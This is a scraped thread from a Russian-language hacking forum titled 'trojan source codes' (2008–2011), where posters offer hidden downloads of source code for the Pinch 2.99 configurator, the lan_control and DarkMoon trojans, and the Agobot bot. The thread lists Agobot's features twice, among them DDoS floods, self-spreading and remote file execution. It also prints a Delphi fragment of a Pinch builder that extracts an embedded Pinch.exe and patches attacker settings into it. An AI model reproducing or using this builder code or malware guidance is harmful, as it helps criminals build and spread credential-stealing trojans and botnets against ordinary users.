Пожалуй начну я :blushing:
Исходник конфигуратора пинча 2.99 от сталина:
и
Исходник трояна lan_control:
Друзья: Всё для вебмастера | [ Реклама на форуме ] |
0
Исходники троянов
Автор
###
, 23 Feb 2008 20:06
#2
Отправлено 16 June 2008 - 20:43
Начну как всегда я B)
Под хайдом исходник трояна DarkMoon v4.11
Agobot
]]>http://www.avira.com...bot.100864.html]]>
Огромный размер из-за, того что в состав бота идут объектные файлы.
Под хайдом исходник трояна DarkMoon v4.11
Agobot
]]>http://www.avira.com...bot.100864.html]]>
Цитата
– Вредоносная программа обладает способностью выполнять следующие действия:
• Начать DDoS SYN атаку
• Запускается DDoS TCP атака
• Запускается DDoS UDP атака
• Отключить сетевые папки общего доступа
• разорвать соединение с IRC сервером
• Загрузить файл
• Редактировать реестр
• Подключить сетевые папки общего доступа
• Запустить файл
• Войти в чат-комнату IRC
• Покинуть чат-комнату IRC
• Произвести DDoS атаку
• Проверка сети
• Перенаправить порт
• Запуск процедуры распространения
• Обновляется самостоятельно
• Загрузить файл
• Посещение веб-страницы
• Начать DDoS SYN атаку
• Запускается DDoS TCP атака
• Запускается DDoS UDP атака
• Отключить сетевые папки общего доступа
• разорвать соединение с IRC сервером
• Загрузить файл
• Редактировать реестр
• Подключить сетевые папки общего доступа
• Запустить файл
• Войти в чат-комнату IRC
• Покинуть чат-комнату IRC
• Произвести DDoS атаку
• Проверка сети
• Перенаправить порт
• Запуск процедуры распространения
• Обновляется самостоятельно
• Загрузить файл
• Посещение веб-страницы
Огромный размер из-за, того что в состав бота идут объектные файлы.
Ссылки из под хайдов не выдаю!
#6
Отправлено 13 September 2008 - 20:17
#8
Отправлено 13 September 2008 - 21:35
#15
Отправлено 15 September 2008 - 09:37
DEN-009 (14.9.2008, 19:17) писал:
Ты посмотри там исходники на асме есть.
Там вообще только 1 компонент.
Там вообще только 1 компонент.
если тебе еще что-то не ясно, то продолжай поиски пинча на делфях
... {$R Resources.res} ... //извлечение ресурсов procedure ExtractRes(ResType, ResName, ResNewName : String); var Res : TResourceStream; Begin Res:=TResourceStream.Create(Hinstance, Resname, Pchar(ResType)); Res.SavetoFile(ResNewName); Res.Free; end; ... //редактирование ехе procedure TForm1.spSkinButton3Click(Sender: TObject); var hFile : THandle; dwTemp : Cardinal; bZero : char; a: string; b, c, s:integer; begin ExtractRes('EXEFILE', 'File', 'Pinch.exe'); hFile := CreateFile('Pinch.EXE',GENERIC_WRITE,0,nil,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); if hFile <> INVALID_HANDLE_VALUE then begin ... //запись данных в файл SetFilePointer(hFile, StrToInt(Edit2.Text), nil, 0); WriteFile(hFile, PChar(Edit66.Text)^, Length(Edit66.Text), dwTemp, nil); SetFilePointer(hFile, StrToInt(Edit12.Text), nil, 0); WriteFile(hFile, PChar(spSkinEdit2.Text)^, Length(spSkinEdit2.Text), dwTemp, nil); if dwTemp = 0 then ShowMessage('Ошибка записи =\'); bZero := #0; WriteFile(hFile, bZero, 0, dwTemp, nil); CloseHandle( hFile ); ...
#18
Отправлено 24 March 2011 - 19:52
#19
Отправлено 30 March 2011 - 17:10
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 анонимных